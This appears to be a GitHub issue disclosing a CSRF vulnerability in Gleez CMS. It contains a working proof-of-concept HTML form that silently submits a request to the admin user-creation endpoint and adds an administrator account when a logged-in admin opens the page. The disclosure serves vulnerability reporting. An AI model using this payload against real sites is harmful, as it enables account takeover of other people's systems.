There is a CSRF vulnerability that can add the administrator account

After the administrator logged in, open the following page to add an administrator.
poc：
<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.gleezcms.org/admin/users/add?0=" method="POST">
      <input type="hidden" name="&#95;token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
      <input type="hidden" name="&#95;action" value="909998bbc9e60ce40ae378a1055b46f3" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="pass" value="test" />
      <input type="hidden" name="nick" value="test" />
      <input type="hidden" name="mail" value="admin&#64;admin&#46;cc" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="roles&#91;admin&#93;" value="Administrative&#32;user&#44;&#32;has&#32;access&#32;to&#32;everything&#46;" />
      <input type="hidden" name="site&#95;url" value="http&#58;&#47;&#47;demo&#46;gleezcms&#46;org&#47;" />
      <input type="hidden" name="user" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There is a CSRF vulnerability that can add the administrator account #800

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

There is a CSRF vulnerability that can add the administrator account #800

Description

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions